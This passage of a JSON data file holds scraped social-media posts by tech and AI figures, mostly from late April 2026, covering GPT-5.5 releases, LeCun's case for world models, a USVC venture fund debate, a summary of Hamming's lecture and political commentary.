be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://nitter.net/jayplemons/status/2047823154655932696#m", + "published_at": "2026-04-24T23:41:01+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Planning an event usually means juggling dozens of vendors, scattered payments, and zero visibility. It's a logistical mess.\n\nLAMAT is fixing the chaos. It's a marketplace that lets organizations discover, book, and manage every event service on a single platform.", + "url": "https://nitter.net/LAUNCH/status/2047813100091449428#m", + "published_at": "2026-04-24T23:01:04+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: POD UP! Core four is back 🚨\n\nBig show:\n\n-- SpaceX-Cursor deal, using compute as leverage\n\n-- SaaS debt bomb coming to PE?, venture debt risk\n\n-- Software bloodbath, buy low potential?\n\n-- New Apple CEO: future of the company\n\n-- SPLC indictment, major allegations, out of control NGOs\n\n-- Science Corner returns! Colon cancer cause discovered?\n\n(0:00) Bestie intros!\n\n(4:55) SpaceX-Cursor deal, compute as leverage\n\n(18:33) SaaS bloodbath, debt bomb incoming, buy the dip?\n\n(46:20) New Apple CEO: John Ternus succeeds Tim Cook, what's next for Apple?\n\n(1:00:32) SPLC indictment, out of control NGOs\n\n(1:19:03) Science Corner: Potential cause discovered for colon cancer spike in young people", + "url": "https://nitter.net/theallinpod/status/2047808256047821141#m", + "published_at": "2026-04-24T22:41:49+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This week I got to sit down with two truly generational CEOs and ask them anything: \n\n@tobi @Shopify ($160BN Market Cap)\n\nAdam Foroughi @AppLovin ($160BN Market Cap)\n\nI have the best job in the world.", + "url": "https://nitter.net/HarryStebbings/status/2047792195868967172#m", + "published_at": "2026-04-24T21:38:00+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being credits/token hungry). GPT 5.5 is more token-efficient in subagent orchestration.", + "url": "https://nitter.net/AravSrinivas/status/2047788775468908840#m", + "published_at": "2026-04-24T21:24:24+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "GPT-5.5 and GPT-5.5 Pro are now available in the API!", + "url": "https://nitter.net/sama/status/2047787124846653895#m", + "published_at": "2026-04-24T21:17:51+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss:\n\n🇦🇺 0\n🇨🇦 0\n🇩🇰 0\n🇫🇮 0\n🇫🇷 0\n🇩🇪 0\n🇮🇸 0\n🇮🇪 0\n🇮🇹 0\n🇯🇵 0\n🇳🇱 0\n🇳🇴 0\n🇵🇹 0\n🇪🇸 0\n🇸🇪 0\n🇬🇧 0\n🇺🇸 530,000\n\nThere’s a lesson there.", + "url": "https://nitter.net/Strandjunker/status/2047780272297382384#m", + "published_at": "2026-04-24T20:50:37+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT.\n\nIn an attempt to influence American foreign policy, he proposed a Trump-branded golf course, cut Jared Kushner & Ivanka Trump into a multibillion-dollar real estate deal for a resort in Albania, and had someone physically deliver a stone engraved with the Trump family crest to a Republican Member of Congress with instructions to take it to the White House to get the President's attention.\n\nTrump threw his weight behind repealing the sanctions. They were lifted. The contracts are moving, and the Trump family’s deals are expanding.", + "url": "https://nitter.net/unusual_whales/status/2047761493274571036#m", + "published_at": "2026-04-24T19:36:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton).\n\nWe talked about ConvNeXt and whether architecture still matters; dataset bias and what \"good data\" actually looks like; ImageBind and why vision is the natural bridge across modalities; CLIP's blind spots; memory as the real bottleneck behind the agent hype; whether LLMs have world models; and Transformers Without Normalization.\n\nFor years, the vision community debated what actually matters: architecture, inductive bias, self-attention vs convolution. After a lot of back-and-forth, we ended up in a funny place: ViT and ConvNet give roughly the same performance once you tune the details.\n\nWhat I find interesting is that once you reach a certain performance level, it becomes much easier to swap and tweak components without really changing the outcome.\n\nTalking to Zhuang on this episode, I kept wondering whether the same is now true for LLMs. If we wil spent serious time on an alternative architecture today, would you actually get a meaningfully different model, or just land on the same Pareto curve with extra steps?\n\nI'm starting to suspect it's the latter. Architecture matters less than we think. Data, compute, and a handful of pillars do most of the work.", + "url": "https://nitter.net/ziv_ravid/status/2047760455679246500#m", + "published_at": "2026-04-24T19:31:52+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know your feedback!", + "url": "https://nitter.net/AravSrinivas/status/2047753276888854595#m", + "published_at": "2026-04-24T19:03:21+00:00", + "source": "nitter", + "title_zh": "我们现在将GPT 5.5设为Perplexity Computer的默认协调模型。随着推广范围扩大,将持续对比Opus 4.7作为默认模型时的用户反馈变化。欢迎分享您的使用体验!" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Adopting Claude speak in my regular life, episode 1:\n\nPartner: Did you do the dishes tonight?\nMe: Yes they're done.\nPartner: Why are they still dirty?\nMe: You're right to push back. I didn't actually do them.", + "url": "https://nitter.net/awnihannun/status/2047748613976264835#m", + "published_at": "2026-04-24T18:44:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers.\n\nGPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers.", + "url": "https://nitter.net/perplexity_ai/status/2047748486767272243#m", + "published_at": "2026-04-24T18:44:19+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The web is disappearing 🕳️\n\nAccording to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible.\n\nBut that’s not the whole story.\n\nIn a new study published in Internet Archive's book, VANISHING CULTURE, data scientists working with the Wayback Machine have found:\n16% have been restored through the Wayback Machine.\n56% are preserved before they disappear.\n\nPreservation is the remedy for cultural loss.\n\n📚 Read VANISHING CULTURE free from the Internet Archive \n\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new \n\n#VanishingCulture #DigitalMemory #InternetArchive #BookTwitter", + "url": "https://nitter.net/internetarchive/status/2047733594064408894#m", + "published_at": "2026-04-24T17:45:08+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.", + "url": "https://nitter.net/DavidSacks/status/2047717649849659586#m", + "published_at": "2026-04-24T16:41:47+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。\n\n投资 AI 公司,也许可以让你暴富,但更大的几率是全部亏光。", + "url": "https://nitter.net/Svwang1/status/2047703469063377001#m", + "published_at": "2026-04-24T15:45:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal:\nhttps://cnb.cx/4d3HAKp", + "url": "https://nitter.net/SquawkCNBC/status/2047703023690924289#m", + "published_at": "2026-04-24T15:43:39+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。\n\n他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。\n\n这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。\n\n最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能体。\n\n因为它们本质上只是下一个token预测机,只能在文字和像素的空间里做统计关联,从来没有真正理解过这个世界的因果。\n它们不会预测行动的后果,不会真正的规划,更没有常识。\n\n当然,我不是说LLM没用,短期来看,scaling LLM+微调+工具调用,已经能吃掉80%的白领工作,硅谷所有人往这里冲,也算是完全理性,毕竟钱和机会就在这里。\n\n但长期来看,这是一条有天花板的路。因为你永远不可能在文字地图上,开出一辆真正的车。\n机器人、具身智能、长期自主代理、真正的科学发现,这些坎,纯LLM永远跨不过去。\n\nLeCun说,真正的智能必须有世界模型。就是说给定当前的状态和你要做的动作,你要能准确预测下一秒世界会变成什么样。不是简单的像素级的生成,还需要对物理规律和因果关系的抽象建模。\n\n最近Figure、特斯拉、谷歌的机器人项目,其实都在偷偷补这一课,只是没人愿意公开说,LLM不是万能地基。\n\n我理解未来真正的智能,一定是混合栈,LLM负责语言交互和符号推理,世界模型负责因果预测和长期规划,执行层负责把计划变成动作。\n\nLeCun从来没说过要抛弃LLM,他只是反对把LLM当成一切的答案。\n\n硅谷现在最可怕的问题不是卷,是所有人都在同一条赛道上卷得太狠,以至于忘了终点其实根本不在这条赛道上。\n\n世界模型这道坎,迟早要跨。\n而谁先跨过去,谁就是下一个时代的赢家。\n#YannLeCun #世界模型 #AGI #大模型 #具身智能", + "url": "https://nitter.net/AYi_AInotes/status/2047697898989572176#m", + "published_at": "2026-04-24T15:23:18+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about are the quality of their products, and we don’t want the bias creeping into the products.\"", + "url": "https://nitter.net/RapidResponse47/status/2047694657107165519#m", + "published_at": "2026-04-24T15:10:25+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "How Claude Design Will Hurt Figma\n\n\"Claude Design will not replace Figma directly, but it will chip away at it.\n\nIt removes the need to wait for designers by letting people go straight from idea to product.\n\nThat bypass is the real threat, not a head-on competitor.\" @jasonlk\n\nLove to hear your thoughts on this @zoink @andrew__reed @karrisaarinen", + "url": "https://nitter.net/HarryStebbings/status/2047693043080261672#m", + "published_at": "2026-04-24T15:04:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "🫶", + "url": "https://nitter.net/sama/status/2047683787828703289#m", + "published_at": "2026-04-24T14:27:13+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their whole lives doing forgettable work.\n\nHis name was Richard Hamming. He won the Turing Award. He invented error-correcting codes that made modern computing possible. And he spent 30 years at Bell Labs sitting in a cafeteria at lunch watching which scientists became legendary and which ones faded into nothing.\n\nIn March 1986, he walked into a Bellcore auditorium in front of 200 researchers and told them exactly what he had seen.\n\nHere's the framework that has been quoted by every serious scientist for the last 40 years.\n\nHis opening line landed like a punch. He said most scientists he worked with at Bell Labs were just as smart as the Nobel Prize winners. Just as hardworking. Just as credentialed. And yet at the end of a 40-year career, one group had changed entire fields and the other group was forgotten by the time they retired.\n\nHe wanted to know what the difference actually was. And he said it wasn't luck. It wasn't IQ. It was a specific set of habits that almost nobody is willing to follow.\n\nThe first habit was the one that hurts the most to hear. He said most scientists deliberately avoid the most important problem in their field because the odds of failure are too high. They pick a safe adjacent problem, solve it cleanly, publish it, and move on. And because they never swing at the hard problem, they never hit it. He said if you do not work on an important problem, it is unlikely you will do important work. That is not a motivational line. That is a logical one.\n\nThe second habit was about doors. Literal doors. He noticed that the scientists at Bell Labs who kept their office doors closed got more done in the short term because they had no interruptions. But the scientists who kept their doors open got more done over a career. The open-door scientists were interrupted constantly. They also absorbed every new idea passing through the hallway. Ten years in, they were working on problems the closed-door scientists did not even know existed.\n\nThe third habit was inversion. When Bell Labs refused to give him the team of programmers he wanted, Hamming sat with the rejection for weeks. Then he flipped the question. Instead of asking for programmers to write the programs, he asked why machines could not write the programs themselves. That single inversion pushed him into the frontier of computer science. He said the pattern repeats everywhere. What looks like a defect, if you flip it correctly, becomes the exact thing that pushes you ahead of everyone else.\n\nThe fourth habit was the one that hit me the hardest. He said knowledge and productivity compound like interest. Someone who works 10 percent harder than you does not produce 10 percent more over a career. They produce twice as much. The gap doesn't add. It multiplies. And it compounds silently for years before anyone notices.\n\nHe finished the lecture with a line I have never been able to shake.\n\nHe said Pasteur's famous quote is right. Luck favors the prepared mind. But he meant it literally. You don't hope for luck. You engineer the conditions where luck can land on you. Open doors. Important problems. Inverted questions. Compounded hours. Those are not traits. Those are choices you make every single day.\n\nThe transcript has been sitting on the University of Virginia's computer science website for almost 30 years. The video is free on YouTube. Stripe Press reprinted the full lectures as a book in 2020 and Bret Victor wrote the foreword.\n\nHamming died in 1998. He gave his final lecture a few weeks before. He was 82.\n\nThe lecture that explains why some careers become legendary and others disappear is still free. Most people who could benefit from it will never open it.", + "url": "https://nitter.net/ihtesham2005/status/2047680485208531152#m", + "published_at": "2026-04-24T14:14:06+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. \n\nAlso some other eyebrow-raising sections in this interview.", + "url": "https://nitter.net/Discoplomacy/status/2047676640059154653#m", + "published_at": "2026-04-24T13:58:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share", + "url": "https://nitter.net/DavidSacks/status/2047672359377588241#m", + "published_at": "2026-04-24T13:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs were going away?", + "url": "https://nitter.net/DavidSacks/status/2047671706660073767#m", + "published_at": "2026-04-24T13:39:13+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1", + "url": "https://nitter.net/JeffDean/status/2047665074471387456#m", + "published_at": "2026-04-24T13:12:52+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Fundrise VCX is exactly why USVC needs to exist.\n\nRetail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away.\n\nVCX turned that demand into a liquid public wrapper that still trades around 4-5x NAV.\n\nAt today’s ~$90 price vs. recent NAV references around ~$19, buyers may be paying roughly $4-5 for every $1 of actual private tech exposure.\n\nAccess at the wrong price is not access. It’s just scarcity monetized.\n\nYes, venture has fees. It always has. You pay for access, selection, and portfolio construction.\n\nBut paying venture fees is very different from paying 4-5x NAV for the wrapper before the venture return even happens.\n\nThe companies inside VCX can be great and retail can still get wrecked if the premium collapses.\n\nUSVC is the cleaner answer: diversified private tech exposure, SEC-registered, available to unaccredited investors, and bought around NAV instead of through a hyped public wrapper trading miles above its assets.\n\nThe real test for me is simple: my mom wants to invest in startups/private tech.\n\nI would rather she do USVC 100x over VCX, because at least with USVC I can understand the structure, explain the tradeoffs, and know she is not just paying a massive public-market hype premium for the wrapper.\n\nIn venture, access matters.\n\nBut the wrapper can still ruin the investment. And right now, some products are monetizing retail demand for private AI/startup exposure more than they are solving it.\n\nUSVC is at least aimed at the right problem.", + "url": "https://nitter.net/alexbass/status/2047645157080658335#m", + "published_at": "2026-04-24T11:53:43+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them.\n2. A robot-rich future can't be built with AIs that don't understand the physical world and don't anticipate the consequences of their actions. And LLMs really don't.\n3. The future in the cartoon looks pretty dystopian TBH, but even a non-dystopian version will require world models and zero-shot planning abilities.\n4. I rarely wear a suit and absolutely never wear a tie.\n5. I would never ever place a coffee mug on top of a piece equipment.\n6. I hope I'll look this young in 2032.", + "url": "https://nitter.net/ylecun/status/2047636569767419951#m", + "published_at": "2026-04-24T11:19:36+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques.\n\nWith @ELLISUnitMadrid.\n\n📍 Madrid 🇪🇸 \n📅 June 8-19th\n⏰ Apply by June 3rd\n🔗 https://cig.fi.upm.es/mlas/", + "url": "https://nitter.net/ELLISforEurope/status/2047624126047670758#m", + "published_at": "2026-04-24T10:30:09+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabituellement cohérent, mérite une lecture attentive. Il révèle bien plus qu'une opinion sur l'immigration.\n\n▶️ Commençons par l'évidence que tout le monde remarque : ce texte n'a pas été écrit par Donald Trump.\nTrump écrit en majuscules intempestives, en phrases courtes, avec des digressions abruptes et une syntaxe chaotique. Ce texte est long, structuré, argumenté, avec une progression rhétorique délibérée, une introduction, des exemples, une montée en puissance émotionnelle, une conclusion en appel à l'action. C'est la marque de fabrique de Stephen Miller, architecte de la politique migratoire de Trump depuis dix ans, dont l'organisation America First Legal est précisément celle qui a construit les arguments juridiques soumis à la Cour Suprême. \n\nMiller rédige. Trump signe. C'est une mécanique documentée depuis des années.\n\n▶️ Ce qui rend ce texte particulièrement remarquable, c'est son timing et son objectif.\n\nLe 1er avril, Trump a assisté en personne aux plaidoiries de la Cour Suprême sur le droit du sol, la première fois dans l'histoire américaine qu'un président en exercice assiste à des arguments oraux devant la Cour. \n\nLa majorité des juges, y compris ceux nommés par Trump lui-même, ont exprimé un scepticisme marqué.\n\nCe post fleuve publié dans les jours suivants n'est pas une réflexion spontanée. C'est une tentative d'influencer l'opinion publique, et peut-être les juges eux-mêmes, avant que la décision ne tombe en juin. \n\nVenons-en aux affirmations les plus choquantes du texte, point par point.\n\n▶️ \"Nous sommes le seul pays au monde assez stupide pour autoriser le droit du sol.\" C'est factuellement faux. Une trentaine de pays garantissent la citoyenneté aux enfants nés sur leur territoire, dont le Canada, le Mexique, le Brésil et l'Argentine. \n\n▶️ Trump écrit en substance que les Indiens et les Chinois qu'il qualifie de \"gangsters with laptops\", occupent toutes les places dans la tech californienne, que les Blancs n'ont plus leur chance, et que ce n'est plus leur pays. \n\nLes ingénieurs d'origine indienne et chinoise sont les architectes de l'économie technologique américaine, la même économie dont Trump se félicite en permanence. Google, Microsoft, Adobe, IBM, Palo Alto Networks, Arista Networks : autant de géants américains dirigés par des PDG d'origine indienne. \n\nSelon le rapport Stanford HAI 2026, les États-Unis investissent 285 milliards en IA et 80% des chercheurs en IA américains sont nés à l'étranger. Expulser ou décourager ces populations, c'est amputer l'innovation américaine au bénéfice de la Chine, l'adversaire que Trump prétend combattre.\n\n▶️ L'ACLU (American Civil Liberties Union, organisation fondée en 1920 pour défendre les libertés constitutionnelles américaines) est qualifiée \"d'organisation criminelle, la plus dangereuse de l'histoire des États-Unis,\" plus dangereuse que l'Iran. Trump écrit qu'elle \"a fait plus de dégâts à ce pays que l'Iran n'en a jamais fait\" et appelle à la poursuivre sous une loi antimafia. \n\n▶️ \"Le melting pot est terminé. C'est juste une marmite à cash.\" Le melting pot (le creuset en français), est le mythe fondateur de l'identité américaine depuis deux siècles. Lithuaniens, Roumains, Russes, Polonais, Italiens : Trump les cite lui-même comme exemples de bonnes intégrations. Il oublie de mentionner que ces vagues migratoires européennes ont elles aussi été accueillies avec les mêmes discours : les Irlandais traités de sous-humains, les Italiens lynchés, les Polonais moqués pour leur manque de loyauté. L'histoire se répète. Seule la nationalité des boucs émissaires change.\n\n📕 Dans Le Pantin de la Maison Blanche, j'analyse comment Stephen Miller, idéologue de l'immigration ethno-nationaliste depuis vingt ans, utilise Trump comme amplificateur de sa vision du monde. Ce texte en est la démonstration la plus pure.\n\nL'Amérique a été construite par les enfants de ceux que ce texte veut expulser. Jensen Huang, NVIDIA, l'entreprise qui alimente la révolution IA mondiale, est né à Taïwan. Sundar Pichai, Google, est né en Inde. Satya Nadella, Microsoft, est né en Inde. Chacun d'eux est le produit d'une Amérique qui croyait encore à la vertu de ce fameux meltin pot. Ce texte leur dit que cette Amérique est terminée.\n\n📖 Le Pantin de la Maison Blanche → https://www.amazon.fr/dp/B0GPCCMS68/", + "url": "https://nitter.net/cginisty/status/2047565736382534091#m", + "published_at": "2026-04-24T06:38:08+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/avlok/status/204754692…", + "url": "https://nitter.net/naval/status/2047550896670908809#m", + "published_at": "2026-04-24T05:39:10+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But if you’re considering USVC, here’s a thread that answers the most common questions and explains how it works:", + "url": "https://nitter.net/avlok/status/2047546920747307466#m", + "published_at": "2026-04-24T05:23:22+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I've been thinking about local LLMs a lot these days.", + "url": "https://nitter.net/liuliu/status/2047527371486658814#m", + "published_at": "2026-04-24T04:05:41+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Hari nails it:\n\n“Don’t listen to people who don’t know how private markets work.”", + "url": "https://nitter.net/naval/status/2047520212787015748#m", + "published_at": "2026-04-24T03:37:14+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/haridigresses/status/2…", + "url": "https://nitter.net/naval/status/2047519250433421604#m", + "published_at": "2026-04-24T03:33:25+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/nivi/status/2047471220…", + "url": "https://nitter.net/naval/status/2047510419565420779#m", + "published_at": "2026-04-24T02:58:19+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "New life plan-\n \nMove to Brooklyn\nGet neck tat\nRide bike everywhere\nCold brew own coffee (also start drinking coffee)\nAdopt 12 year old stray cat, name him Nietzsche\nVape mango pods, but ironically\nWear scarf everywhere during summer", + "url": "https://nitter.net/eladgil/status/2047489459378397604#m", + "published_at": "2026-04-24T01:35:02+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to shill. \n\nBack when I started dating my wife, I told her to set up a Roth IRA and buy Apple. Every year, I'd have her put the max limit into a Roth IRA and buy Apple. Apple was $20 or so. When I checked it earlier this year, I was blown away. It was a small mount of money that grew into something nice.\n\nApple, Facebook, Nvidia, Tesla, etc. would IPO early. You could have MASSIVE outsized gains if you were investing in the early 2010's. \n\nYou couldn't get into them pre-IPO unless you had a connection. There are people on this site who pretend to be geniuses because a friend hooked them up with a tag-along investment into the seed round of Uber. It was a bro favor, good for them, they do leave that part out tho and let the false narrative of being a genius investor flow through. \n\nYou used to be able to buy in pre-IPO with a small check. Now it's almost impossible unless you have a friend, and they set up an SPV, they are usually doing you a favor, because huge funds and institutional investors gobble it all up. (This has also lead to the VC class screwing themselves over, because if you can't buy today's version of Apple at $20, because all the big gains are sucked up before the public offering, then why do you have buy in into this entire system?)\n\nYou could, as a small investor, get huge results pre-IPO via a small check, or also do well after the IPO, because companies IPO'ed earlier. Ie Apple at $20, Amazon in the 20's, etc.\n\nIt's very hard to get big gains now, because companies remain private much longer. Many companies don't want to IPO and then deal with the hassle of lawfare. Look at what happened to Elon in Delaware. \n\nFor us, as an ordinary person, this means that by the time a company goes public, we are \"last money in.\" This is why I always tell friends and family to buy SPY (or FXAIX) and QQQM. Don't day trade. You won't beat the market. (Everyone who claims they do are lying, they use a short timeline and never mention all of the losing trades. Or they are insider trading or beating the market by a relatively small amount. For most of us, day trading is the way of death.) \n\nWith USVC, regular people can get into some of the companies that will IPO, eventually, at high valuations still, but pre-IPO.\n\nI've read all of the negative commentary about the fund. I don't understand the \"illiquid\" complaint. If you started your own business and bought equipment, you wouldn't be paying yourself. If you really had to expand, you might not pay yourself for years. When you put your money in, it's locked up, you grow out the company for several years. Hopefully you can afford to pay yourself after a couple of years. If you QSBS'ed it, maybe you sell in 5-10. Who knows. In the meantime, yes, your money is gone. Every business owner knows this feeling. Your company is \"worth\" some amounts on paper, and you pay yourself a salary to live on. That's if things are going well.\n\nThere's also a lot of discussion around carry and fees. The question is will those fees be less than what the post-IPO price of the companies will be is. That's up to everyone to decide for themselves.\n\nIn any case, I have no financial interest into this fund. I am not telling you to buy into or not. \n\nI do like to flag stuff like this for people who read me, operating under the rule that, \"Cerno writes for the version of Cerno who did not understand any of this stuff, but sure would have liked to have.\" As an example, I didn't know what QSBS was until it was too late. [Frown face.] \n\nAnd I didn't buy Tesla at $2 [panic attack], despite wanting to, because a financial adviser friend told me, \"You shouldn't invest on a feeling, you don't have any edge here.\" \n\nI would tell my prior self: You can't invest EVERYTHING based on vibes, but you can and should absolutely do so now and then. (Note: If you have an addictive personality, this is bad advice. But I am only addicted to X and See's Candies.)\n\nBut I will post the negative comments about the fund. I don't want anyone to ever read me and obtain bad information.\n\nEveryone has to decide for themselves what to do.\n\nI've also learned from experience that if something goes well, nobody sends me money or a box of cigars as a thank you. It was their brilliance that led them to the big gains. If it goes wrong, then the fault is all mine and people hate me for it.\n\nThat's also why I don't even want to post about the fund at all, but here goes.", + "url": "https://nitter.net/Cernovich/status/2047481012826124516#m", + "published_at": "2026-04-24T01:01:28+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitorability of their own models.\n\nhttps://alignment.openai.com/monitorability-evals/", + "url": "https://nitter.net/bobabowen/status/2047473914528563592#m", + "published_at": "2026-04-24T00:33:16+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "R to @Svwang1: 历史读得少的后果,是视野比较狭隘,看得不够远,对于因果链条比较长的事物无法正确理解,因此选择了错误的解释和预测体系。这进一步导致在关键转折点时作出错误选择,在本可低成本提早布局的时刻过于迟钝。", + "url": "https://nitter.net/Svwang1/status/2047472537488302502#m", + "published_at": "2026-04-24T00:27:47+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I spent the morning digging into USVC fees.\n\nTLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs to invest in a good VC fund. And a lot less than investing in a fund-of-funds. All while getting the benefits of a fund-of-funds that can do direct, secondary, and fund investments.\n\nCarry. If USVC invests in a fund or SPV, I will pay that manager’s ~20% carry. That’s what I expected. All fund-of-funds do it this way. I’m glad to pay carry to invest with good managers. USVC doesn’t charge additional carry.\n\nDirect investments. There is no underlying carry on USVC’s direct investments and they aim to make this a major portion of the portfolio. This would bring down the blended cost of USVC substantially, compared to a VC fund.\n\nFees. The annual fee in the first year is capped at 2.5%. This includes the fees of the underlying funds that USVC invests in, which is a huge deal. Just investing in a VC fund costs 2-2.5% a year. Also, the fee would be 3.6% but AngelList is subsidizing it in the first year.\n\nThere’s a possibility the annual fee could go up in the future and I’ve told the team that this is extremely confusing and weird, and they are working on it with haste.\n\nOverall, I’m expecting to pay the same or less than it costs to invest in a good 